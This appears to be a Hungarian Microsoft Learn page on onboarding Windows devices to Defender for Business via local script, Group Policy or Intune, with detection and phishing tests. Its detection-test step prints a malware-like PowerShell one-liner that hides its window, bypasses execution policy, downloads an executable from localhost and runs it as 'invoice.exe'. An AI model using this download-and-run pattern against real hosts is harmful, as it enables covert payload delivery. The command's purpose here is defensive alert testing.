Megosztás a következőn keresztül:


Eszközök előkészítése Microsoft Defender Vállalati verzió

Ez a cikk bemutatja, hogyan regisztrálhat eszközöket a Defender Vállalati verzióban.

Az 5. lépést ábrázoló vizualizáció – eszközök előkészítése a Defender Vállalati verzióba.

Vegye fel az üzleti eszközöket, hogy azonnal védhesse őket. Számos lehetőség közül választhat a vállalati eszközök előkészítéséhez. Ez a cikk végigvezeti a lehetőségeken, és ismerteti az előkészítés működését.

Teendők

  1. Válasszon egy lapot:
    • Windows 10 és 11
    • Mac
    • Mobil (új képességek érhetők el iOS- és Android-eszközökhöz!)
    • Kiszolgálók (Windows Server vagy Linux Server)
  2. Tekintse meg az előkészítési beállításokat, és kövesse a kiválasztott lapon található útmutatást.
  3. Az előkészített eszközök listájának megtekintése.
  4. Adathalászati teszt futtatása egy eszközön.
  5. Folytassa a következő lépésekkel.

Windows 10 és 11

Megjegyzés:

A Windows-eszközöknek az alábbi operációs rendszerek egyikét kell futtatniuk:

  • Windows 10 vagy 11 Business
  • Windows 10 vagy 11 Professional
  • Windows 10 vagy 11 Enterprise

További információ: Microsoft Defender Vállalati verzió követelmények.

A Windows-ügyféleszközök a Defender Vállalati verzióba való előkészítéséhez válasszon az alábbi lehetőségek közül:

Helyi szkript a Windows 10 és a 11-hez

Windows-ügyféleszközök előkészítéséhez helyi szkriptet használhat. Amikor egy eszközön futtatja az előkészítési szkriptet, az létrehoz egy megbízhatósági kapcsolatot Microsoft Entra ID (ha ez a megbízhatóság még nem létezik), regisztrálja az eszközt a Microsoft Intune (ha még nincs regisztrálva), majd regisztrálja az eszközt a Defender Vállalati verzióban. Ha jelenleg nem Intune használ, a Helyi szkript metódus az ajánlott előkészítési módszer a Defender for Business ügyfelei számára.

Tipp

Javasoljuk, hogy a helyi szkriptmetódus használatakor egyszerre legfeljebb 10 eszközt hozzon létre.

  1. Nyissa meg a Microsoft Defender portált (https://security.microsoft.com), és jelentkezzen be.

  2. A navigációs panelen válassza a Beállítások>Végpontok elemet, majd az Eszközkezelés területen válassza az Előkészítés lehetőséget.

  3. Válassza a Windows 10 és a 11 lehetőséget, majd az Üzembe helyezési módszer szakaszban válassza a Helyi szkript lehetőséget.

  4. Válassza az Előkészítési csomag letöltése lehetőséget. Javasoljuk, hogy mentse az előkészítési csomagot egy cserélhető meghajtóra.

  5. Windows-eszközön bontsa ki a konfigurációs csomag tartalmát egy helyre, például az Asztal mappába. Rendelkeznie kell egy nevű fájllal WindowsDefenderATPLocalOnboardingScript.cmd.

  6. Nyisson meg egy parancssort rendszergazdaként.

  7. Írja be a szkriptfájl helyét. Ha például a fájlt az Asztal mappába másolta, írja be a parancsot %userprofile%\Desktop\WindowsDefenderATPLocalOnboardingScript.cmd, majd nyomja le az Enter billentyűt (vagy kattintson az OK gombra).

  8. A szkript futtatása után futtasson egy észlelési tesztet.

Windows 10 és 11 Csoportházirend

Ha inkább a Csoportházirend-t szeretné használni a Windows-ügyfelek előkészítéséhez, kövesse a Windows-eszközök előkészítése a Csoportházirend használatával című cikk útmutatását. Ez a cikk a Végponthoz készült Microsoft Defender előkészítésének lépéseit ismerteti. A Defender vállalati verzióra való előkészítés lépései hasonlóak.

Intune Windows 10 és 11 esetén

A Windows-ügyfeleket és más eszközöket a Intune a Intune Felügyeleti központban (https://intune.microsoft.com) helyezheti üzembe. Az eszközök Intune való regisztrálására számos módszer áll rendelkezésre. Az alábbi módszerek egyikét javasoljuk:

Automatikus regisztráció engedélyezése Windows 10 és 11 esetén

Az automatikus regisztráció beállításakor a felhasználók hozzáadják munkahelyi fiókjukat az eszközhöz. A háttérben az eszköz regisztrálja és csatlakoztatja Microsoft Entra ID, és regisztrálva van a Intune.

  1. Nyissa meg a Azure Portal (https://portal.azure.com/) és jelentkezzen be.

  2. Válassza a Microsoft Entra ID>Mobilitás (MDM és MAM)>Microsoft Intune lehetőséget.

  3. Konfigurálja az MDM-felhasználói hatókört és a MAM felhasználói hatókört.

    Képernyőkép az MDM felhasználói hatókörének és a MAM felhasználói hatókörének beállításáról Intune.

    • Az MDM-felhasználók hatóköre esetében azt javasoljuk, hogy válassza az Összes lehetőséget, hogy minden felhasználó automatikusan regisztrálhassa Windows-eszközeit.

    • A MAM felhasználói hatóköre szakaszban a következő alapértelmezett értékeket javasoljuk az URL-címekhez:

      • MDM használati feltételek URL-címe
      • MDM-felderítési URL-cím
      • MDM-megfelelőségi URL-cím
  4. Válassza a Mentés elemet.

  5. Miután regisztrált egy eszközt a Intune, hozzáadhatja azt egy eszközcsoporthoz a Defender Vállalati verzióban. További információ a Defender Vállalati verzió eszközcsoportjairól.

Kérje meg a felhasználókat, hogy regisztrálják Windows 10 és 11 eszközüket

  1. Az alábbi videóból megtudhatja, hogyan működik a regisztráció:

  2. A cikk megosztása a szervezet felhasználóival: Windows 10/11-eszközök regisztrálása Intune.

  3. Miután regisztrált egy eszközt a Intune, hozzáadhatja azt egy eszközcsoporthoz a Defender Vállalati verzióban. További információ a Defender Vállalati verzió eszközcsoportjairól.

Észlelési teszt futtatása Windows 10 vagy 11 eszközön

Miután előkészítette a Windows-eszközöket a Defender for Businessbe, futtathat egy észlelési tesztet az eszközön, hogy minden megfelelően működjön.

  1. A Windows-eszközön hozzon létre egy mappát: C:\test-MDATP-test.

  2. Nyissa meg a parancssort rendszergazdaként.

  3. A Parancssor ablakban futtassa a következő PowerShell-parancsot:

    powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
    

A parancs futtatása után a parancssori ablak automatikusan bezárul. Ha sikeres, az észlelési teszt befejezettként lesz megjelölve, és körülbelül 10 percen belül megjelenik egy új riasztás az újonnan előkészített eszköz Microsoft Defender portálon (https://security.microsoft.com).

Előkészített eszközök listájának megtekintése

Fontos

Az alábbi eljárás végrehajtásához megfelelő szerepkörrel kell rendelkeznie, például globális rendszergazdához, biztonsági rendszergazdához vagy biztonsági olvasóhoz. További információ: Szerepkörök a Defender Vállalati verzióban.

  1. Nyissa meg a Microsoft Defender portált (https://security.microsoft.com), és jelentkezzen be.

  2. A navigációs panelen lépjen az Eszközök>eszközök területre. Megnyílik az Eszközleltár nézet.

Adathalászati teszt futtatása eszközön

Az eszköz előkészítése után futtathat egy gyors adathalászati tesztet, amely ellenőrzi, hogy az eszköz csatlakoztatva van-e, és hogy a riasztások a várt módon jönnek-e létre.

  1. Egy eszközön nyissa meg a https://smartscreentestratings2.netelemet. A Defender Vállalati verziónak le kell tiltania ezt az URL-címet a felhasználó eszközén.

  2. A szervezet biztonsági csapatának tagjaként lépjen a Microsoft Defender portálra (https://security.microsoft.com), és jelentkezzen be.

  3. A navigációs ablakban lépjen az Incidensek elemre. Egy tájékoztató riasztásnak kell megjelennie, amely azt jelzi, hogy egy eszköz megpróbált hozzáférni egy adathalász webhelyhez.

Következő lépések